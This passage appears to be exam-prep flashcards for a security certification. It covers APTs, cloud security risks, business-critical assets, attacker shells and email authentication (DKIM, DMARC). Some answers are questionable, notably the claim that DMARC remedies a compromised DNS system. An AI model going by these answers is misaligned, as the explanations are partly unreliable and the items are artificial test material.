A

Changes to the file system are a host-related issue, as they can affect the entire system rather than a single application.

An unexpected outbound communication is an application-related issue. In many cases, it is an attempt by a malicious backdoor to call home to the hacker.

A service interruption is an application-related issue, and only involves the interruption of that service.

Any time an issue is reported to the Application log in Windows Event Viewer, it is an application-related issue. This log is maintained by Windows systems and records when something occurs within (or affects) the application. Examples of logged events would include:

Memory leaks
Non-existent path errors
Unhandled exceptions in the code
A system crash

138
Q

Which type of threat involves a highly skilled group of attackers who keep their presence hidden so that they can continually exploit their targets?

A)Insider threat
B)Shadow IT
C)DoS
D)APT

A

Advanced persistent threats (APTs) are prolonged strategic attacks that hackers try to keep hidden so that they can continually exploit their targets. They are usually sourced from hostile nation-states and have high-profile targets, including national infrastructure and the military.

139
Q

You and the other members of your team are discussing the benefits and risks of a cloud environment versus an on-premises environment, and the discussion turns to security. Which statement is NOT true regarding cloud security?

A)Malicious behavior by insiders may compromise data.

B)Co-locations create a larger attack surface.

C)There is ambiguous responsibility.

D)It is easier to control administrative access.

A

Controlling administrative access is MORE difficult in a cloud environment because access is provided through the Internet, eliminating the physical security and perimeter security provided in the on-premises environment.

It is true that insiders at the provider may cause issues because of the access rights they hold while supporting your tenancy.

It is true that with the responsibility split between the provider and the tenant, gaps in securing the solution may appear.

It is true that co-locations create a larger attack surface. In this scenario, you are sharing the virtual environment and there is more danger from other tenants, which is an issue that does not exist in on-premises environments.

140
Q

The threat hunting team is attempting to identify business-critical assets and processes. Which of the following would be the LEAST likely to be identified as such?

A)guest Internet access
B)commerce server
C)company chat service
D)DNS server

A

Guest Internet access would be classified as a non-critical business asset because its loss would have very little, if any, impact on the ability to continue to operate normally.

Loss of the DNS server would bring the entire network down shortly after its loss. DNS services are required to access any asset, locally or remotely, by its name rather than its IP address.

Loss of the commerce server will spell a loss of income during the time it is down and damage to the organization’s reputation if it is an extended outage.

While the company chat server is not typically considered one of the business-critical assets and processes, as compared to guest Internet access, it would be considered more important as it provides a form of communication that could be a backup if email is down.

141
Q

In which of the following scenarios would the ability to interpret suspicious commands be helpful?

A)when an attacker alters an email header to obscure the sender

B)when an attacker accesses a shell

C)when an email-based attack uses embedded and malicious links

D)when an attacker compromises the DNS system

A

When an attacker is able to install a shell (also called dropping a shell), they will be able to access a command line interface to the system. In this scenario, one’s ability to interpret any strange commands they may have entered and executed may help to identify exactly what the attacker did or was attempting to do.

142
Q

Email-based attack?

A

An email-based attack uses embedded and malicious links in an email. While training users not to click any hyperlinks in incoming emails is one solution, you can go a step further and disable hyperlinks in emails.

143
Q

What can you use when an attacker obscures the header?

A

When an attacker alters an email header to obscure the sender and perform impersonation, a solution would be to implement DomainKeys Identified Mail (DKIM), an email authentication method designed to detect forged sender addresses in email (email spoofing), a technique often used in phishing and email spam. DKIM has the sending domain sign selected headers and the body, so a receiver can verify that the signing domain vouched for the message and that the signed parts were not altered in transit. On its own it does not check that the signing domain matches the visible From: address; that alignment check is what DMARC adds.

144
Q

What can you use when an attacker compromises the DNS system that email relies on?

A

When an attacker compromises the DNS system, a solution would be to implement Domain-based Message Authentication, Reporting, and Conformance (DMARC).

When a DMARC DNS entry is published, any receiving email server can authenticate the incoming email, preventing a delivery based on an altered header.

DMARC extends two email authentication mechanisms: Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM). It allows the administrative owner of a domain to publish a policy in their DNS records to specify how to check the From: field presented to end users.